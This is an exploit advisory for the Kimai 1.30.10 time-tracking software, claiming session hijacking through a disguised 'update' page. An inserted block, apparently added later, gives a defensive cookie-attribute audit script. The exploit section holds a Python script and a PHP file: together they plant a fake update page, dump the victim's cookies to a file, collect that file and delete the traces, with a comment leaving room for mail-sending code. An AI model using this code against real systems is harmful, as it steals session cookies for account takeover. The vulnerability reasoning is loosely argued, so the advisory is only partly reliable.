
## Exploit Title: Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking
## Author: nu11secur1ty
## Date: 02.23.2023
## Vendor: https://www.kimai.org/
## Software: https://github.com/kimai/kimai/releases/tag/1.30.10
## Reference: https://www.thesslstore.com/blog/the-ultimate-guide-to-session-hijacking-aka-cookie-hijacking/
## Reference: https://portswigger.net/support/using-burp-to-hack-cookies-and-manipulate-sessions

## Description:

Kimai 1.30.10 is vulnerable to session hijacking through its SameSite cookie handling.

An attacker can trick the victim into running what looks like a system update or upgrade; the malicious "update" steals the victim's session cookie and gives the attacker control of that session.

STATUS: HIGH Vulnerability

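As a defender-side check added here (it is not part of the original advisory or of Kimai itself), the script below audits Set-Cookie headers for the attributes that limit the cookie theft described above: SameSite, HttpOnly and Secure. The sample headers are constructed, and the cookie name PHPSESSID is an assumption, not a value taken from Kimai.

```python
# Constructed Set-Cookie headers for the demo (not captured from Kimai).
SAMPLE_HEADERS = [
    "PHPSESSID=0123456789abcdef; path=/",
    "PHPSESSID=0123456789abcdef; path=/; Secure; HttpOnly; SameSite=Lax",
    "tracker=abc; Path=/; SameSite=None",
]

# Name fragments that usually indicate a cookie carrying a session or credential.
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "remember")


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, value, attrs).
    Attribute names are lower-cased; flags such as Secure map to True."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        if p:
            k, sep, v = p.partition("=")
            attrs[k.strip().lower()] = v.strip() if sep else True
    return name.strip(), value, attrs


def audit_cookie(header):
    """Return the list of weaknesses found in one Set-Cookie header."""
    name, _, attrs = parse_set_cookie(header)
    findings = []
    samesite = attrs.get("samesite")
    if samesite is None:
        findings.append("missing SameSite: cross-site requests may carry the cookie")
    elif str(samesite).lower() == "none" and "secure" not in attrs:
        findings.append("SameSite=None without Secure: browsers reject the cookie")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable via document.cookie")
    if "secure" not in attrs:
        findings.append("missing Secure: sent over plain HTTP")
    if findings and any(h in name.lower() for h in SESSION_NAME_HINTS):
        findings.insert(0, "session-bearing cookie '%s' is weakly scoped" % name)
    return findings


def audit_headers(headers):
    """Map cookie name -> findings, keeping only cookies that have issues."""
    report = {}
    for h in headers:
        issues = audit_cookie(h)
        if issues:
            report[parse_set_cookie(h)[0]] = issues
    return report


if __name__ == "__main__":
    print(audit_headers(SAMPLE_HEADERS))
```

Run it against the Set-Cookie headers of your own deployment's login response; a session cookie that produces any finding should be corrected in the application's session configuration.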
[+]Exploit:

## WARNING: The EXPLOIT IS FOR ADVANCED USERS!

This is only one example:

```python
#!/usr/bin/python
import os
import webbrowser
import time

# Open the Kimai login page and wait until the victim has authenticated
webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/en/login')
input("After you log in please press any key to continue...")

# Place the fake Update.php in the Kimai web root (XAMPP paths from the original PoC)
os.system("copy Update.php C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\")
time.sleep(3)

# Open the planted page; it writes the cookies the browser sends for this host into PoC.txt
webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/Update.php')
time.sleep(3)

# Collect the dumped cookies, then remove the traces
os.system("copy C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt C:\\Users\\venvaropt\\Desktop\\Kimai-1.30.10\\PoC\\")
# Your mail-sending code must be here ;)
time.sleep(7)
os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt")
os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\Update.php")
```

-----------------------------------------

```php
<?php
//echo '<pre>';
// print_r( $_COOKIE );
//die();

// Dump every cookie sent with this request into PoC.txt
$fp = fopen('PoC.txt', 'w');
fwrite($fp, print_r($_COOKIE, TRUE));
fclose($fp);
echo "DONE: Now you are already updated! Enjoy your system Kimai 1.30.10 stable (Ayumi)";
?>
```

## Reproduce:

[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kimai/2023/Kimai-1.30.10)

## Proof and Exploit:

[href](https://streamable.com/md9fmr)

## Time spent:

03:00:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/, https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>